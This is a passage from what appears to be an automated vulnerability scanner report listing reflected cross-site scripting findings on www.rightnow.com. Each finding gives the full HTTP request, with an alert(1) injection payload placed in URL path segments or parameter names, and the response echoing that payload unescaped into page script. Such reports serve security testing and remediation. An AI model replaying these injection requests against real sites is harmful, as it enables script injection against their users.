The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b94'-alert(1)-'0069db6cb1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/rightnow.tv.player.swf79b94'-alert(1)-'0069db6cb1f HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT; noChat=RNTLIVE; s_sess=%20p17%3Dhttp%253A%252F%252Fburp%252Fshow%252F46%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38710

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/rightnow.tv.player.swf79b94'-alert(1)-'0069db6cb1f',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.262. http://www.rightnow.com/javascript/s_code.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bfd8'-alert(1)-'ba7f15548b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript2bfd8'-alert(1)-'ba7f15548b7/s_code.js?_=1314814583383 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38713

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript2bfd8'-alert(1)-'ba7f15548b7/s_code.js?_=1314814583383',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async:
...[SNIP]...

4.263. http://www.rightnow.com/javascript/s_code.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e2d'-alert(1)-'cd0cf84d869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/s_code.js25e2d'-alert(1)-'cd0cf84d869?_=1314814583383 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38713

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/s_code.js25e2d'-alert(1)-'cd0cf84d869?_=1314814583383',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.264. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f66a'-alert(1)-'3ec72f2288e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf953f66a'-alert(1)-'3ec72f2288e/floatbox/floatbox.css HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38737

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf953f66a'-alert(1)-'3ec72f2288e/floatbox/floatbox.css',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: fals
...[SNIP]...

4.265. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82cb2'-alert(1)-'2f5e1b427b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox82cb2'-alert(1)-'2f5e1b427b9/floatbox.css HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38737

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
om/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox82cb2'-alert(1)-'2f5e1b427b9/floatbox.css',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.266. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51c9b'-alert(1)-'2d75c23b47b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css51c9b'-alert(1)-'2d75c23b47b HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38737

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
remium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css51c9b'-alert(1)-'2d75c23b47b',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.267. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a2e'-alert(1)-'1de2dab2528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css?81a2e'-alert(1)-'1de2dab2528=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38740

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
emium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css?81a2e'-alert(1)-'1de2dab2528=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.268. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f787'-alert(1)-'ef6b2446d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf951f787'-alert(1)-'ef6b2446d8c/floatbox/floatbox.js HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38736

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf951f787'-alert(1)-'ef6b2446d8c/floatbox/floatbox.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false
...[SNIP]...

4.269. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7494'-alert(1)-'68ed11db77c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatboxe7494'-alert(1)-'68ed11db77c/floatbox.js HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38736

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
om/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatboxe7494'-alert(1)-'68ed11db77c/floatbox.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.270. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9ea'-alert(1)-'0a284f6c62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.jscb9ea'-alert(1)-'0a284f6c62 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38735

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.jscb9ea'-alert(1)-'0a284f6c62',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.271. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63488'-alert(1)-'17302e9ed49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js?63488'-alert(1)-'17302e9ed49=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38739

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
remium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js?63488'-alert(1)-'17302e9ed49=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.272. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6735c'-alert(1)-'03965d14717 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf956735c'-alert(1)-'03965d14717/floatbox/options.js HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38735

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf956735c'-alert(1)-'03965d14717/floatbox/options.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false}
...[SNIP]...

4.273. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js

Issue detail

